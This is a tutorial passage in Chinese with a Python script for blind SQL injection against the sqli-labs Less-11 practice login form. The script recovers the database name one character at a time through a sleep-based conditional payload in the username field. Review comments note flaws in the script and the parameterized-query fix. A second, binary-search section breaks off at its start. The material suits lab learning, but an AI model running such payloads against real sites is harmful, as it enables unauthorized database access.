关于 SQL 时间盲注爆破数据库名
未使用二分法（逐个候选字符线性枚举；注意：下面的脚本根据响应内容是否包含 "admin" 来判断，并没有测量响应时间）
import requests
import datetime
# Request headers intended to look like a desktop Firefox browser.
# NOTE(review): the key is spelled "User - Agent" (with spaces), so it is not
# the standard User-Agent header name, and the value carries similar stray
# spaces -- this looks like a copy/paste artefact. Nothing in the visible
# script passes this dict to requests, so it currently has no effect.
headers = {
    "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0",
}
def main():
    """Recover the current database name from the sqli-labs Less-11 login form.

    For each of the character positions 1..8 the function walks the candidate
    codes 65..121 in ascending order and POSTs a login form whose ``uname``
    field carries a conditional comparing the character at that position of
    ``database()`` with the candidate. The first candidate whose response
    does NOT contain the text "admin" is taken as the character for that
    position; the assembled string is printed at the end.

    Review notes:
      * Although the page describes this as time-based, no response time is
        measured here. The decision is made purely on the response body; the
        ``sleep(1)`` in the payload only delays the request on which the
        comparison is false.
      * Presumably the lab page echoes "admin" on a successful login and not
        on a failed one -- confirm against the lab instance.
      * If no candidate in 65..121 produces a response without "admin",
        nothing is appended for that position. Presumably a position past
        the end of the name, or a character below code 65, is recorded as
        "A" (the first candidate) -- verify before trusting the output.
      * ``requests.post`` is called without ``timeout`` and without the
        module-level ``headers`` dict.
      * Server side, this traffic is a burst of near-identical POSTs to the
        login form whose ``uname`` contains ``ascii(substr(database(),...))``
        and ``sleep()``; binding ``uname``/``passwd`` as query parameters
        instead of concatenating them removes the injection point.
    """
    # Lab target and payload template are constant, so build them once.
    target = "http://192.168.0.100/sqli-labs-master/Less-11/"
    template = "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#"

    recovered = ""
    for position in range(1, 9):
        for code in range(65, 122):
            form = {
                "uname": template.format(position, code),
                "passwd": "11",
            }
            print(form)
            reply = requests.post(url=target, data=form)
            if "admin" in reply.text:
                # Comparison held (character code > candidate): keep going.
                continue
            # First candidate for which the comparison failed.
            letter = chr(code)
            print(letter)
            recovered += letter
            break
    print(recovered)
if __name__ == "__main__":
    # Report the wall-clock duration of the whole run. This is the only
    # timing the script takes; individual requests are not timed.
    started = datetime.datetime.now()
    main()
    finished = datetime.datetime.now()
    print(finished - started)
使用二分法
import requests
import datetime
#基于时间盲注使用ascii()函数
#1.编写盲注函数
#2.编写二分法函数
#3.编写ascii码转换函数
def